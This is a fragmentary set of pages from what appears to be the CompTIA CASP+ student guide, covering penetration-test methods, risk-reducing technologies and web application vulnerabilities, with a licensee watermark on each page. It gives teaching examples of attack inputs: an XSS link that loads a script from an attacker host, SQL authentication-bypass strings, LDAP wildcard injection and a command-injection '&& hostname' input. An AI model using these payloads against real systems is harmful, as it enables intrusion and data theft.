analysis approach requires evaluation of a system or software while it is running.
Evaluation tasks may be manual interactions with the features and functions
that comprise the system, application, or interactions that leverage the power of
specialized tools, for example using Burp Suite to carefully observe, control, and/or
manipulate the data moving between the browser and application.
Side-Channel Analysis
Side-channel analysis describes inspections of a system and/or software as it
operates. Even if traffic is encrypted, information can be collected about the state
of an application or information about the endpoints and/or users interacting with
it. An example of side-channel analysis includes packet capture and traffic analysis
using the wide range of features and functionality available within tools designed
for this purpose, such as Wireshark.
Reverse Engineering
Reverse engineering describes deconstructing software and/or hardware to
determine how it is crafted. Reverse engineering’s objective is to determine how
much information can be extracted from delivered software. For example, reverse
engineering can sometimes extract source code, identify software methods and
languages used, developer comments, variable names and types, system and web
calls, and many other things. An adversary can perform reverse engineering on a
software patch to identify the vulnerabilities it is crafted to fix, or an analyst can
perform reverse engineering on malware to determine how it operates. Other
examples include the theft of intellectual property by extracting elements of a
delivered product that are otherwise protected. Reverse engineering is not limited
to software, hardware can be reverse engineered to better understand how it
operates in order to insert malicious components, for the theft of intellectual
property, and/or to carefully inspect how a device operates in order to confirm
it meets security requirements or to determine if it has been tampered with.
Reversing can be performed on all nature of devices, and some examples might
include security tokens, computer equipment, network and wireless equipment,
cars, wearables, IoT devices, and many others.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 269
Fuzz Testing
Fuzz testing is a black box testing method using specialty software tools designed
to identify problems and issues with an application by purposely inputting or
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
270 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
injecting malformed data to it. A fuzzer is the tool used to automatically generate
and inject the malformed data. The fuzzer will generally use different number
formats, character types, text values, and/or binary values as it operates and
include sequences and values known to be problematic, such as very large, zero,
or negative numbers; URLs instead of typical values; and escaped or interpretable
sequences such as SQL commands. Additional information regarding fuzz testing is
available at https://owasp.org/www-community/Fuzzing.
Pivoting
Pivoting describes the actions of an attacker using one exploited system to access
another within the same organization which allows an attacker a much greater
opportunity to stay hidden and continue to operate for an extended period of time.
Successful pivoting correlates to the quality of network segmentation and host
protection mechanisms within the target organization.
Post Exploitation
An exploited system may warrant further work in order for an adversary (or pen-tester)
to maintain access to it for future use. The value of the system can influence this
decision where value is determined based on the data accessible on the system/
device and the ability to use it to reach other systems or interact with other devices
to gain additional access to the environment.
Persistence
Describes an adversary's (or pen-tester's) ability to establish the capability to access
the target environment at-will and undetected. This is typically accomplished
through the installation of backdoors, rogue system services, creation of rogue user
accounts, and/or other methods that persist system reboots.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 271
Port Scanner
A port scanner is used to identify available services running on a device by
determining its open ports. A port scanner can be used for network discovery tasks
and security auditing. Port scanners provide a useful way to quickly assess any
inventory systems and software running in a networked environment to help locate
unauthorized or unpatched applications.
HTTP Interceptor
An HTTP interceptor is used to capture http/https traffic between hosts in order
to inspect and/or modify it. The goal of this is to manipulate the operation of the
web application and/or the data sent to it. Using an HTTP interceptor helps further
decompose the operation of a web application to gain a deeper understanding of
its operation and potential vulnerabilities and/or methods to exploit it. Burp Suite
and BeEF are two popular examples of HTTP interceptor tools.
Burp Suite capturing wikipedia.org http traffic generated by the Firefox web browser using
the Foxy Proxy plugin (Screenshot courtesy of PortSwigger, Ltd.)
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
272 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
The SCAP compliance scanner with 15 different STIGs available for use in an assessment
(Screenshot courtesy of DoD Cyber Exchange).
Vulnerability Scanner
Vulnerability scanners can assess endpoint devices such as computers, network
equipment, and mobile devices, as well as the applications installed on them.
Vulnerability scanners can also identify configuration issues, such as the use of
application defaults, default usernames and passwords, and known weaknesses,
especially in relation to missing security patches. Vulnerability scanners identify
weaknesses using the standard methods, identifiers, and scoring mechanisms
designed and published by Mitre and NIST.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 273
Exploit Framework
An exploit framework describes a collection of tools designed to aid in the
exploitation of systems and software. Different exploitation frameworks have
different areas of focus. Popular examples include Metasploit, which contains
thousands of exploits covering a wide variety of software and platforms, and The
Browser Exploitation Framework BeEF, which is focused on the web browser for
client-side attack vectors.
Password Cracker
Password cracker describes the software utilities designed to crack passwords using
a variety of methods. A password cracker can be used to assess the strength of
passwords from the perspective of vulnerability assessment or penetration testing.
Passwords can be cracked online or offline and can use a variety of methods,
depending on the tool being used and whether or not the file containing passwords
is accessible.
Dependency Management
It is uncommon to find software and/or systems that operate completely
independently. One system typically depends on at least one other, and likely more,
and software commonly incorporates features and functionality provided by other
software tools, often by including third-party libraries during software development.
Effectively evaluating vulnerabilities includes accommodating these dependencies.
For example, testing one system separately from the other systems upon which it
depends may not reveal vulnerabilities that are linked to the data interfaces needed
to integrate the two systems together. A critical component to asset inventories is
the identification of individual assets plus all of the other systems, software, and
libraries upon which it depends.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
274 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Permissions and Access—A penetration test may require a certain level of access
to be granted as part of the assessment project. The amount of access to be
granted will depend upon the type and scope of the assessment, for example, if
the pen-test must be performed on-site, pen-testers may need to be provided with
ID badges, undergo background checks, and have equipment granted permission
to access network resources, etc. These actions can add considerable time to the
assessment.
Facility Considerations—If a pen-test is to be performed on-site, it is important to
consider corporate policy requirements regarding escorted vs. unescorted access
and/or limits for when staff, contractors, and/or employees are allowed to be
on-premise.
Physical Security Considerations—Whether or not physical security controls
are to be assessed should be carefully detailed. If physical security controls are
within the scope of an assessment, pen-testers should be provided with a signed
document attesting to the fact that they have been hired to assess physical security,
also known as a “get out of jail” card, in case the pen-testers are caught breaking-in.
Rescan for Corrections/Changes—A pen-test should include a report detailing
the findings of the assessment as well as a prioritized listing of recommended
remediations. Also, the pen-test should define a window of time during which the
pen-tester will reevaluate any issues after recommended remediations have been
implemented and at no additional charge.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 275
Review Activity:
Vulnerability and Penetration
Test Methods
7
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
276 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 11C
Explain Technologies Designed to
Reduce Risk
6
Building and designing defensive operations requires the use of many tools
covering the wide range of data sources needed to stay informed and to support
operational visibility requirements. These tools support each other in this regard,
tools need to be put into place that can log activities and the information they
generate must then be supplied to security operations in order to identify and
respond to security incidents. The information collected and analyzed by security
operations may identify the need for additional tools, which then generate even
more information in need of analysis. This cycle describes security operations
in general, the need to continuously adapt and improve to respond to evolving
business trends and threat actor techniques.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 277
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
278 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
• Threat Feeds
• Network traffic
• IDS/IPS
• Data sources that provide context to other data, for example vacation calendars,
geo-location, and asset data
Security data analytics can be used to perform basic, essential employee monitoring
or more advanced techniques such as User and Entity Behavior Analytics (UEBA),
analyzing network activity to detect suspicious traffic, identifying unauthorized
account use, identifying account breaches, supporting threat hunting, detecting
malicious insider activities, and many other similar security operations capabilities.
To do this, security data analytics platforms must process collected data, often
referred to as indexing. Indexing takes already collected data and further
decomposes it by identifying important data elements such as hostname, source,
source-type, timestamps, character set, end of line markers, and other fields that
can be defined by the platform operators and are unique to the organization.
Indexing is a critically important function as its output allows an analyst to perform
searches. Searching allows for the discovery and identification of actionable data
stored within huge data sets in order to discover information and/or patterns
that would otherwise be hidden. Searches can also be used to generate alerts,
essentially immortalizing a search query in a way that allows it to automatically
discover similar events and send a notification immediately after. The power
of searching is only exposed after data has been collected and processed in an
automated way that translates all of the disparate data types and data sources into
a unified and searchable format.
An area of specific interest and sensitivity is database activity monitoring (DAM),
which can require specialized software tools to adequately perform its required
duties. Database activity monitoring is focused on the identification of changes and/
or specific activities within a database management system (DBMS.) The DAM can
perform data discovery and classifications tasks, user rights management, privileged
user monitoring, and data protection tasks (such as loss protection.) The DAM can
monitor SQL language to determine if andwhen actions are performed against
sensitive or protected data or if sensitive actions are performed against the database
or a set of related or interdependent databases. It can also export its own log data to
external sources, limit access to the database based on location/source, and generate
alerts for a wide range of scenarios. In short, the DAM provides deep, customizable
visibility into the actions performed on a database which is a requirement of many
regulations and standards such as PCI-DSS and Sarbanes-Oxley (SOX).
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 279
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
280 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Application Controls
Allow list vs. block list—Allow lists and block lists (formerly referred to as white and
black lists) describe the capability to define either what can run vs. what cannot run
on a system. An allow list is an incredibly powerful control designed to define “only
these” application lists and literally blocks all other applications from running. While
the functionality is appealing from a security perspective, the cost is often realized
through administrative burden of managing the allow list. A block list, in contrast, is less
restrictive but can be useful to flag known sources of issue, for example applications
that allow non-administrative users to install them to their profile directories (as is the
case with some web browsers) or to universally block applications from running from
specific file paths, such as the user profile, temp directories, or other similar locations.
There are several high-quality third-party tools available to use when implementing
allow and block list functionality, for Windows hosts, the AppLocker utility can be
used as an effective way to implement these controls without additional licensing.
Additionally, the Windows Defender Application Control feature can expand upon the
controls available from AppLocker, such as allowing applications based on approved
code signatures, reputation, installation source, and other signatures. More information
is available at https://docs.microsoft.com/en-us/windows/security/threat-protection/
windows-defender-application-control/wdac-and-applocker-overview.
Licensing—Identifying authorized software use includes the need for licensing
compliance. It can often seem as though understanding software license models
is a career path in itself, but knowing what constitutes compliant use and
implementing measures to verify and enforce compliance is critical. Software
licensing agreements invariably include clauses for periodic compliance audits
performed by the vendor. If found to be out of compliance, vendor fines and
“catch-up” licensing fees can easily translate to hundreds of thousands or millions
of dollars and also cost the company a significant dent in its credibility, integrity,
and trust. Many tools, including the same tools used for patch management, can
provide license/installation reports for various software applications, and policies
and procedures defining how these tools are to be used on an ongoing basis to
verify license compliance should be established.
Time of check vs. time of use (TOCTOU)— These issues are associated with
programming that follows a sequence of events and makes assumptions about
the state of the steps. For example, an application may be designed to process
data in a strict order of 10 steps but, when the application runs in a multi-threaded
environment, steps 1-5 and 6-10 are performed simultaneously, resulting in
unintended consequences. Another example may involve performing a series of
steps after checking an important value. If the important value changes while the
remaining tasks are being completed, this can result in trouble too. A practical
example includes the status of user accounts: a user can authenticate to gain access
to an operating system after which the account may be disabled in the central identity
system. The user still has access to the operating system as the account was changed
after they authenticated, and so the user will maintain access to the host. This same
basic premise can materialize within applications as well where this basic premise
can be exploited in order to trick an application into completing an unauthorized
task. Mitigations are dependent upon the skill, knowledge, and awareness of the
software developer but require, among other things, the need to lock/block the state
of the critical element until the application completes its task. For the user example,
perhaps the account cannot be disabled until active sessions are terminated.
Atomic execution describes the capability for a task to run with exclusive access
to resources, in contrast, a lack of atomic execution means that more than one task
can access or modify critical resources and potentially change their state, which
potentially exposes the application to a TOCTOU attack. More detailed information
regarding TOCTOU is available at the Common Weakness Enumeration page
https://cwe.mitre.org/data/definitions/367.html.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 281
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
282 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Technologies Designed to Reduce Risk
Answer the following questions:
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11C
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 283
Lesson 11
Summary
6
Key Takeaways
• Threat intelligence can be collected from formal, structured sources as well as
informal, unstructured sources.
• Threat actors describe categories of adversaries and the skills, motivations, and
funding levels attributed to each.
• Attack frameworks help describe the specific tactics and techniques used by
different threat actor groups.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 12
Developing Incident Response
Capabilities
1
LESSON INTRODUCTION
Understanding how software is exploited is the first step in knowing how to
develop response capabilities, which is oftentimes summarized as “offense
informing defense.” This chapter begins by exploring the unique characteristics
and highly interdependent nature of modern web applications and some of the
critical components needed to protect them. While developing secure software
and building secure infrastructures are an essential part of cyber operations, it is
important to understand that issues and incidents are still going to happen. To this
end, critical cyber infrastructure and incident response capabilities will be explored,
including consideration for the work needed to quickly and accurately locate
indicators of compromise. Lastly, digital forensic concepts will be explored to better
understand the tools and techniques native to this highly specialized field.
Lesson Objectives
In this lesson, you will:
• Explore web application protections.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
286 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 12A
Analyzing and Mitigating
Vulnerabilities
2
Vulnerability scanning tools are incredibly useful when working to locate technical
vulnerabilities and understand their severity. Vulnerability scanning is only part
of the overall solution when working to identify and analyze vulnerabilities. Many
organizations invest in single vulnerability scanning solutions and use them to
locate misconfigurations and missing patches and this is important, but there is
a whole class of other vulnerabilities that are complicated to assess and require
special knowledge and tools to effectively locate.
Software-defined everything is an accurate way to describe modern IT
infrastructure and it is the very operation of this software that can be the source
of many highly severe vulnerabilities. This topic will explore the common elements
that shape how software operates and some of the unique weaknesses affecting
it. Understanding and locating software vulnerabilities requires decomposing the
functional parts that comprise a working application.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 287
Buffer Overflow
Buffer overflow is an attack against system memory and has been an issue since
the dawn of computing. Buffer overflow describes when temporary memory space
used while an application runs is provided with more data than it can properly
store. The result of this is that a well-designed attack can access other parts of
system memory resulting in a wide range of problems. Most generally, a buffer
overflow can allow an attacker to insert executable code or different values to an
application as it is running on a system. There are a few important methods to
protecting against buffer overflow.
1. Patching—buffer overflow vulnerabilities are often addressed with security
patches.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
288 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
4. Using limits or delays to slow failed login attempts, logging all such attempts,
and generating alerts when they repeatedly occur
7. Implementing session timeouts and expiring session ids so they cannot be reused
Insecure References
Insecure references are a class of vulnerability related to weak access controls
whereby an application will take user-supplied input and use it to provide access
to an object otherwise inaccessible to the user. An insecure direct object reference
(IDOR) allows a user to manipulate the URL to gain access to resources.
Some examples:
https://www.foo.com/customer?custid=12123 The customer ID
can be changed to access other customer information on the site.
https://www.foo.com/files/coupon-codes.md Files stored on the
server can be accessed by specifying their path in the URL, in this example coupon
codes are stored in a text file.
In the first example, user identifiers should not be used in the URL. More generally,
any user-provided values should be inspected prior to being used.
Vulnerability Description
Poor exception handling Describes when an application is not
written to anticipate problems or safely
manage them to leave the application
in a controlled state. Without exception
handling, an application may break in a
way that leaves it in an unsafe state or
allow unrestricted access to protected
systems and/or data.
Security misconfiguration Describes a range of issues related to
poorly implemented or documented
security controls. Examples include
using default credentials and/or default
settings, unpatched vulnerabilities, and
unprotected files/directories. More
information is available at https://
owasp.org/www-project-top-ten/2017/
A6_2017-Security_Misconfiguration.
Weak cryptography implementations Just because something is encrypted does
not mean it is safe. Some algorithms and
modes of encryption/hashing are not
secure by modern standards, and their
existence should be cause for concern.
Some examples include DES/3DES, RC4,
SHA-1, ECB (mode of operation), short
keys with RSA/DSA, and ECDH with
curves “smaller” than P-224. Additionally,
encryption algorithms that store data in
temp files or do not adequately protect
private keys are highly concerning.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 289
Vulnerability Description
Information disclosure Information disclosure, or sensitive data
exposure, describes how information
can be stolen from an application or
during communications because it is
not protected, via encryption or other
means, or is encrypted using weak keys,
algorithms, and/or protocols. Sensitive
data exposure can result in the theft
of encryption keys, on-path attacks,
stealing data such as credentials, PII, PHI,
account numbers, and/or other types
of protected privacy data.
2. Digital Signature
3. Bulk Encryption
4. Hashing
The components used in a cipher suite are described using a standard annotation:
PROTOCOL_KEY EXCHANGE ALGORITHM_DIGITAL SIGNATURE
ALGORITHM_BULK ENCRYPTION ALGORITHM_HASHING ALGORITHM
The following is a list of cipher suites for TLS 1.2:
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
290 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305
TLS 1.3 improves upon TLS 1.2 by focusing on performance while also improving
security. To do this, RSA is replaced. The result is a shortened cipher suite list that
simply lists:
PROTOCOL_BULK ENCRYPTION ALGORITHM_HASHING ALGORITHM
Additionally, bulk ciphers in TLS 1.3 must be of type AEAD, such as GCM.
The following is a list of cipher suites for TLS 1.3:
TLS_AES_256_GCM_SHA384
TLS_CHACHA20_POLY1305_SHA256
TLS_AES_128_GCM_SHA256
TLS_AES_128_CCM_8_SHA256
TLS_AES_128_CCM_SHA256
Additional information regarding cipher suites is included in lesson topic 9B.
Improper Headers
HTTP response headers control how a web server operates in order to increase
the security of its operation. Response headers are not configured by default and
should therefore form part of a web server hardening baseline. Proper header
configuration can protect against CSRF, XSS, downgrade attacks, cookie hijacking,
user impersonation, clickjacking, and many other attacks. OWASP provides detailed
explanations regarding the following HTTP response headers:
• HTTP Strict Transport Security (HSTS)
• X-Frame-Options
• X-XSS-Protection
• X-Content-Type-Options
• Content-Security-Policy
• X-Permitted-Cross-Domain-Policies
• Referrer-Policy
• Expect-CT
• Feature-Policy
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 291
HTTP response headers can cause web applications to stop operating properly and
require careful planning and testing prior to use in production environments.
Certificate Errors
Certificates are essentially files that make SSL encryption possible. When
improperly configured, certificates can cause problems most commonly resulting in
error messages being displayed in web browsers. Certificate errors should be fully
resolved in order to prevent users from becoming accustomed to simply clicking
past the error messages. This is problematic in cases where the errors are caused
by a legitimate security concern but due to user complacency the errors are ignored
and accepted.
Common causes of certificate errors include:
1. Untrusted issuer/CA
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
292 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
The open-source fossology tool displaying license types discovered within a software project
(Screenshot courtesy of www.fossology.org.)
The OWASP Dependency-Track tool displaying the severity rating of vulnerable components
discovered within a project (Screenshot courtesy of OWASP Dependency-Track project.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 293
• Ruby on Rails—A popular web application framework that superseded the Ruby
Merb framework.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
294 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 295
Browser Extensions
Browser extensions can be added to a web browser in order to expand its functionality
or add features not present by default. Browser extensions are dependent upon the
browser and as such are not accessible by the code loaded by the browser itself. This
differs from browser plugins which are applications installed in ways that allow them
to be “called,” or executed, by website code. Examples of plugins include Adobe Flash,
Microsoft ActiveX, and Oracle Java. Plugins are a valuable target for adversaries as
they operate outside of the browser and therefore provide a unique pathway to the
underlying operating system on which a browser is installed. Additionally, plugins
such as the now deprecated Flash and ActiveX software frameworks were once very
popular and widely implemented but were notoriously encumbered with security
vulnerabilities. As such they should be avoided by all measures. Modern browsers
have moved away from plugins and instead now offer broad support for extensions.
While extensions offer many significant security improvements over the plugin model,
extensions can still pose a significant security threat. Extensions can be used to alter
how a browser interprets and loads a webpage and/or requires interaction with
external, third-party services in order to operate.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
296 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
HTML5 allows for the use of several native features and APIs. HTML5 items that
warrant special consideration include:
• Web Messaging (Cross Domain Messaging)
• WebSockets
• Server-Sent Events
• Local/Offline/Web Storage
• Client-Side Databases
• Geolocation requests
• WebWorkers
• Tabnabbing
• Sandboxed Frames
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 297
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
298 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
the attacker will make a vulnerable website send malicious code to the victim’s
browser which will perform whatever actions the code is designed to perform, such
as read protected data within the web app, capture login credentials, push malware
to the web application, or perform any action the user is able to complete in the
web app.
The attacker may send a well crafted URL to the victim which will execute against
the web server when clicked. For example:
https://www.foo.com/status?message=<script
src=https://bar.com/attackscript.js></script>
Which would make the foo.com webserver push the attackscript.js file,
hosted on the attacker’s website bar.com, to the victim’s browser where it would
be executed and perform whatever tasks it was designed to perform.
Specific details and best practice defenses for XSS attacks are available from
OWASP at https://owasp.org/www-community/attacks/xss/. The defensive
approaches are extensive and require careful consideration and planning to
properly implement. As a general rule, any user-provided information must be
carefully inspected prior to use.
• Reflected XSS—This type of XSS attack is like the one described above where
the attack “bounces” off the web server when the link is clicked.
• Stored XSS—This type of attack inserts the malicious code into the web
application, oftentimes by putting the script syntax into a comment field used
by the web application. User supplied comments are stored by the website and
presented to any future site visitors (for example people commenting on an
article or providing a product review). The website will push the malicious script
to the browser of every visitor to the page as the comments are loaded.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 299
LDAP Injection
LDAP injection manipulates LDAP strings to perform malicious actions. For
example, if an application uses the following code to take user input to search
for a user in the directory, then an attacker could simply provide the wildcard “*”
character (which would be used by the variable searchName) and be provided with
a listing of all users stored in the directory!
string ldapSearch = “(cn =“$searchName”)”;
System.out.println(ldapSearch);
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
300 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Authentication Bypass
An authentication bypass attack often exploits how user logins are obtained and
processed by web applications. A common authentication bypass attack involves
the use of SQL language in place of the username expected by the application. This
attack is most effective for web applications that concatenate user inputs directly
to SQL statements which are then executed against a database. Common examples
include providing a username of ‘ OR ‘x’ = ‘x’ -- or' OR 1=1 --
which often result in the attacker being authenticated as the administrative user
of the web application with no knowledge of the actual username or password.
Protecting against this type of attack includes input validation (checking for,
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 301
Command Injection
Command injection attacks take advantage of web applications that bypass
operating system APIs and instead spawn command shells to complete actions
because doing so can be less complicated to complete. In the example of a web
form, the concatenate characters (&&) can be used to append a command to the
actions intended to be completed by the web application. For example, a basic
web application may be designed to test connectivity to an ip address, the web
application can be crafted to ask the user to provide an IP address or hostname,
store it in a variable endpoint, and then take the user-supplied information and use
it to craft the command:
ping $endpoint
Which would then display the command output to the browser. Under normal
circumstances, if a user supplied wikipedia.org the resulting command would be:
ping wikipedia.org
If the attacker provided input of wikipedia.org && hostname, the resulting
command would be:
ping wikipedia.org && hostname
which would result in the ping output being displayed to the screen followed by
the hostname of the operating system hosting the web application. The type of
actions performed are limited only by the imagination and creativity of the attacker.
As with other examples, user-supplied input should be inspected prior to use but
in this example we see that spawning command shells within code should not be
performed. Operating system APIs should always be used instead of command
shells.
Specific details and best practice defenses for command injection attacks are
available from OWASP at https://owasp.org/www-community/attacks/Command_
Injection.
Process Injection
Process injection is well defined within the MITRE ATT&CK Framework as attack
ID T1055 and describes an attack whereby an adversary can inject code into an
existing process to evade detection and potentially gain access privileges equivalent
to the exploited process. Process injection allows an attacker to access system
resources, network resources, and/or memory.
Detecting process injection attacks requires careful monitoring of operating system
API calls used to create or modify existing threads or API calls designed to modify
process memory. These types of calls generally require the use of tools specifically
designed to detect malicious instances of these API calls.
The MITRE ATT&CK page describing process injection, as well as all process injection
sub-techniques, is available at https://attack.mitre.org/techniques/T1055/.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
302 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Stealing a server no longer requires physical access to the data center, a virtual machine
is literally a file stored in a file system which could be stolen by (essentially) using copy-
and-paste functionality!
VLAN Hopping
In a similar scenario to VM hopping and VM Escape, VLAN hopping exploits the
functionality provided by a shared topology. VLANs provide excellent features and
functionality for network infrastructure, but the very mechanisms designed to
provide these features also offer unique opportunities for attack. A VLAN hopping
attack allows an adversary to move between otherwise isolated or segmented
networks by exploiting the switch used to implement the VLANs. VLAN hopping
attacks are most commonly performed via switched spoofing and/or double
tagging. In a switched spoofing attack, the adversary transmits traffic to the
switch to identify that it originates from another switch, as opposed to a standard
end device. This results in the vulnerable switch automatically configuring the
connected port as a trunk, which is a special purpose configuration designed to
extend the functionality of switching a VLAN design across multiple connected
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 303
switches. The result is that the attacker will obtain access to all VLAN traffic.
Mitigating this type of attack requires that the default configuration of the switch
be changed to not allow dynamic trunking, namely that trunk ports are explicitly
defined and configured by a network administrator or engineer. The second
type of attack, double tagging, involves the adversary exploiting the way in which
VLAN are implemented by most switches, namely that the concept of VLANs is
implemented via the use of tags in Ethernet frames. A double tagging attack
again looks to take advantage of trunking by exploiting the native VLAN, which is
ultimately a privileged VLAN needed in order for a switch to manage and maintain
the overall capabilities of trunking and VLANs. The adversary takes advantage
of the default configuration of the native VLAN (which is typically VLAN ID 1) by
manipulating tags. To defend against a native VLAN attack, the default VLAN ID
should be changed (and the value must be the same for all connected switches),
and no user devices should be added to the native VLAN.
Vulnerability Description
Interception Attacks Describe any attack designed to provide
unauthorized access to network traffic.
Interception attacks can be mitigated
through the implementation of network
access controls and traffic encryption.
Denial-of-Service (DoS)/DDoS Attacks against availability can be
effectively defended against through the
use of DoS/DDoS mitigation services
offered by cloud service providers and ISPs.
Social Engineering Social engineering (SE) attacks are
designed to exploit people in any
number of creative ways. Social
engineering attacks are some of the
most successful types of attacks used
by adversaries, and the best protections
include recurring end-user training and
awareness, the use of internally developed
SE campaigns to identify vulnerabilities
among employee and staff, and the
principle of least privilege to limit the
